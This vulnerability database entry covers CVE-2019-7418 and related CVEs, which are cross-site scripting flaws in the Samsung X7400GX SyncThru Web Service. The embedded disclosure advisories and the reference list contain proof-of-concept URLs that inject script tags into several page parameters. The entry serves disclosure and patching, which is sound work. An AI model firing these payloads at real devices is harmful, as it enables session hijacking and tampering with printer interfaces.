Sign-up

ID

VAR-201903-0461


CVE

CVE-2019-7418


TITLE

SAMSUNG X7400GX SyncThru Web Service Vulnerable to cross-site scripting

Trust: 0.8

sources: JVNDB: JVNDB-2019-002785

DESCRIPTION

SAMSUNG X7400GX SyncThru Web Service Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. <!-- # Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web Service # Date: 24-01-2019 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Software Link: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015 # Tested on: all # CVE : CVE-2019-7418 # Category: webapps 1. Description XSS exists in SAMSUNG X7400GX SyncThru Web Service V6.A6.25 V11.01.05.25_08-21-2015 in "/sws/swsAlert.sws" in multiple parameters: flag, frame, func, and Nfunc. 2. Proof of Concept URL http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=&frame=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org &msg=The%20requested%20report(s)%20will%20be%20printed Parameter frame=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org URL http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org &frame=&msg=The%20requested%20report(s)%20will%20be%20printed Parameter flag=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org URL http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed Parameter Nfunc=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org URL http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&Nfunc=closePopup('successMsg ','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed Parameter func=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org URL http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed Parameter type=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org URL http://X.X.X.X/sws/swsAlert.sws?popupid=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E&type=alert&bullet=suc&func=&Nfunc=closePopup('successMsg ','','')&flag=&frame=&msg=The%20requested%20report(s)%20will%20be%20printed Parameter popupid=<SCRIPT>alert("XSS");</SCRIPT> 3. Solution: Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web Service # Date: 24-01-2019 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Software Link: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015 # Tested on: all # CVE : CVE-2019-7419 # Category: webapps 1. 2. Proof of Concept URL http://X.X.X.X/sws/leftmenu.sws?ruiFw_id=FirmwareVersion&ruiFw_pid=Maintenance&ruiFw_title=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E Parameter ruiFw_title=<SCRIPT>alert(XSS);</SCRIPT> URL http://X.X.X.X/sws/leftmenu.sws?ruiFw_id=FirmwareVersion&ruiFw_pid=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E&ruiFw_title=Mantenimiento Parameter ruiFw_pid=<SCRIPT>alert(XSS);</SCRIPT> URL http://X.X.X.X/sws/leftmenu.sws?ruiFw_id=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E&ruiFw_pid=Maintenance&ruiFw_title=Mantenimiento Parameter ruiFw_id=<SCRIPT>alert(XSS);</SCRIPT> 3. Solution: Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web Service # Date: 24-01-2019 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Software Link: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015 # Tested on: all # CVE : CVE-2019-7420 # Category: webapps 1. Proof of Concept URL http://X.X.X.X/sws.application/information/networkinformationView.sws?tabName=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E Parameter tabName=%3CSCRIPT%3Ealert(%22XSS%22);%3C/SCRIPT%3E 3. Solution: Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules --> <!-- # Exploit Title: Cross Site Scripting in SAMSUNG X7400GX Sync Thru Web Service # Date: 24-01-2019 # Exploit Author: Rafael Pedrero # Vendor Homepage: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Software Link: http://www.samsungprinter.com/, http://www.samsung.com/Support/ProductSupport/download/index.aspx # Version: SAMSUNG X7400GX Sync Thru Web Service Firmware Version System Firmware Version V6.A6.25, Main Firmware Version V11.01.05.25_08-21-2015 # Tested on: all # CVE : CVE-2019-7421 # Category: webapps 1. 2. Proof of Concept URL http://X.X.X.X/sws.login/gnb/loginView.sws?contextpath=bob@%3CSCRipt%3Ealert(XSS)%3C/scrIPT%3E.XSSproxy.org Parameter contextpath=bob@<SCRipt>alert(XSS)</scrIPT>.XSSproxy.org URL http://X.X.X.X/sws.login/gnb/loginView.sws?basedURL=%3CSCRIPT%3Ealert(XSS);%3C/SCRIPT%3E&popupid=id_Login Parameter basedURL=<SCRIPT>alert(XSS);</SCRIPT> 3. Solution: Update to last version this product. Patch: https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules -->

Trust: 0.9

sources: JVNDB: JVNDB-2019-002785 // VULHUB: VHN-158853 // PACKETSTORM: 151584

AFFECTED PRODUCTS

vendor:samsungmodel:syncthru web servicescope:eqversion: -

Trust: 1.0

vendor:samsungmodel:x7400gxscope:eqversion:6.a6.25

Trust: 1.0

vendor:samsungmodel:syncthru web servicescope: - version: -

Trust: 0.8

vendor:samsungmodel:x7400gxscope: - version: -

Trust: 0.8

sources: JVNDB: JVNDB-2019-002785 // NVD: CVE-2019-7418

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2019-7418
value: MEDIUM

Trust: 1.0

NVD: CVE-2019-7418
value: MEDIUM

Trust: 0.8

CNNVD: CNNVD-201902-607
value: MEDIUM

Trust: 0.6

VULHUB: VHN-158853
value: MEDIUM

Trust: 0.1

VULMON: CVE-2019-7418
value: MEDIUM

Trust: 0.1

nvd@nist.gov: CVE-2019-7418
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.9

VULHUB: VHN-158853
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

nvd@nist.gov: CVE-2019-7418
baseSeverity: MEDIUM
baseScore: 6.1
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: REQUIRED
scope: CHANGED
confidentialityImpact: LOW
integrityImpact: LOW
availabilityImpact: NONE
exploitabilityScore: 2.8
impactScore: 2.7
version: 3.0

Trust: 1.8

sources: VULHUB: VHN-158853 // VULMON: CVE-2019-7418 // JVNDB: JVNDB-2019-002785 // CNNVD: CNNVD-201902-607 // NVD: CVE-2019-7418

PROBLEMTYPE DATA

problemtype:CWE-79

Trust: 1.9

sources: VULHUB: VHN-158853 // JVNDB: JVNDB-2019-002785 // NVD: CVE-2019-7418

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201902-607

TYPE

xss

Trust: 0.7

sources: PACKETSTORM: 151584 // CNNVD: CNNVD-201902-607

CONFIGURATIONS

sources:
            
            
            JVNDB: JVNDB-2019-002785

PATCH
title:Top Pageurl:http://www.samsungprinter.com/
Trust: 0.8
title:SAMSUNG X7400GX SyncThru Web Service Security vulnerabilitiesurl:http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=89401
Trust: 0.6
title:Threatposturl:https://threatpost.com/rapid-attacks-extort-ransomware/175445/
Trust: 0.1
sources:
            
            
            VULMON: CVE-2019-7418 // 
            
            
            
            JVNDB: JVNDB-2019-002785 // 
            
            
            
            CNNVD: CNNVD-201902-607

EXTERNAL IDS
db:NVDid:CVE-2019-7418
Trust: 2.7
db:PACKETSTORMid:151584
Trust: 2.7
db:JVNDBid:JVNDB-2019-002785
Trust: 0.8
db:CNNVDid:CNNVD-201902-607
Trust: 0.7
db:VULHUBid:VHN-158853
Trust: 0.1
db:VULMONid:CVE-2019-7418
Trust: 0.1
sources:
            
            
            VULHUB: VHN-158853 // 
            
            
            
            VULMON: CVE-2019-7418 // 
            
            
            
            JVNDB: JVNDB-2019-002785 // 
            
            
            
            PACKETSTORM: 151584 // 
            
            
            
            CNNVD: CNNVD-201902-607 // 
            
            
            
            NVD: CVE-2019-7418

REFERENCES
url:http://packetstormsecurity.com/files/151584/samsung-x7400gx-sync-thru-web-cross-site-scripting.html
Trust: 3.2
url:http://www.samsung.com/support/productsupport/download/index.aspx
Trust: 1.9
url:http://seclists.org/fulldisclosure/2019/feb/28
Trust: 1.8
url:http://www.samsungprinter.com/
Trust: 1.8
url:https://nvd.nist.gov/vuln/detail/cve-2019-7418
Trust: 1.5
url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-7418
Trust: 0.8
url:https://cwe.mitre.org/data/definitions/79.html
Trust: 0.1
url:https://nvd.nist.gov
Trust: 0.1
url:https://threatpost.com/rapid-attacks-extort-ransomware/175445/
Trust: 0.1
url:http://x.x.x.x/sws/swsalert.sws?popupid=%3cscript%3ealert(%22xss%22);%3c/script%3e&type=alert&bullet=suc&func=bob@%3cscript%3ealert(xss)%3c/script%3e.xssproxy.org&nfunc=closepopup('successmsg
Trust: 0.1
url:https://nvd.nist.gov/vuln/detail/cve-2019-7421
Trust: 0.1
url:http://x.x.x.x/sws/leftmenu.sws?ruifw_id=%3cscript%3ealert(xss);%3c/script%3e&ruifw_pid=maintenance&ruifw_title=mantenimiento
Trust: 0.1
url:http://x.x.x.x/sws/leftmenu.sws?ruifw_id=firmwareversion&ruifw_pid=maintenance&ruifw_title=%3cscript%3ealert(xss);%3c/script%3e
Trust: 0.1
url:https://nvd.nist.gov/vuln/detail/cve-2019-7419
Trust: 0.1
url:http://x.x.x.x/sws/swsalert.sws?popupid=%3cscript%3ealert(%22xss%22);%3c/script%3e&type=bob@%3cscript%3ealert(xss)%3c/script%3e.xssproxy.org&bullet=suc&func=&nfunc=closepopup('successmsg
Trust: 0.1
url:https://www.owasp.org/index.php/xss_(cross_site_scripting)_prevention_cheat_sheet#xss_prevention_rules
Trust: 0.1
url:http://x.x.x.x/sws.login/gnb/loginview.sws?basedurl=%3cscript%3ealert(xss);%3c/script%3e&popupid=id_login
Trust: 0.1
url:http://x.x.x.x/sws.login/gnb/loginview.sws?contextpath=bob@%3cscript%3ealert(xss)%3c/script%3e.xssproxy.org
Trust: 0.1
url:http://x.x.x.x/sws/leftmenu.sws?ruifw_id=firmwareversion&ruifw_pid=%3cscript%3ealert(xss);%3c/script%3e&ruifw_title=mantenimiento
Trust: 0.1
url:http://www.samsungprinter.com/,
Trust: 0.1
url:http://x.x.x.x/sws.application/information/networkinformationview.sws?tabname=%3cscript%3ealert(%22xss%22);%3c/script%3e
Trust: 0.1
url:https://nvd.nist.gov/vuln/detail/cve-2019-7420
Trust: 0.1
url:http://x.x.x.x/sws/swsalert.sws?popupid=%3cscript%3ealert(%22xss%22);%3c/script%3e&type=alert&bullet=suc&func=&nfunc=closepopup('successmsg
Trust: 0.1
url:http://x.x.x.x/sws/swsalert.sws?popupid=%3cscript%3ealert(%22xss%22);%3c/script%3e&type=alert&bullet=suc&func=&nfunc=bob@%3cscript%3ealert(xss)%3c/script%3e.xssproxy.org&flag=&frame=&msg=the%20requested%20report(s)%20will%20be%20printed
Trust: 0.1
sources:
            
            
            VULHUB: VHN-158853 // 
            
            
            
            VULMON: CVE-2019-7418 // 
            
            
            
            JVNDB: JVNDB-2019-002785 // 
            
            
            
            PACKETSTORM: 151584 // 
            
            
            
            CNNVD: CNNVD-201902-607 // 
            
            
            
            NVD: CVE-2019-7418

CREDITS
Rafael Pedrero
Trust: 0.1
sources:
            
            
            PACKETSTORM: 151584

SOURCES
db:VULHUBid:VHN-158853
db:VULMONid:CVE-2019-7418
db:JVNDBid:JVNDB-2019-002785
db:PACKETSTORMid:151584
db:CNNVDid:CNNVD-201902-607
db:NVDid:CVE-2019-7418

LAST UPDATE DATE
2024-11-23T22:12:08.669000+00:00

SOURCES UPDATE DATE
db:VULHUBid:VHN-158853date:2019-03-25T00:00:00
db:VULMONid:CVE-2019-7418date:2019-03-25T00:00:00
db:JVNDBid:JVNDB-2019-002785date:2019-04-22T00:00:00
db:CNNVDid:CNNVD-201902-607date:2019-04-01T00:00:00
db:NVDid:CVE-2019-7418date:2024-11-21T04:48:11.237

SOURCES RELEASE DATE
db:VULHUBid:VHN-158853date:2019-03-21T00:00:00
db:VULMONid:CVE-2019-7418date:2019-03-21T00:00:00
db:JVNDBid:JVNDB-2019-002785date:2019-04-22T00:00:00
db:PACKETSTORMid:151584date:2019-02-08T02:22:22
db:CNNVDid:CNNVD-201902-607date:2019-02-08T00:00:00
db:NVDid:CVE-2019-7418date:2019-03-21T16:01:12.750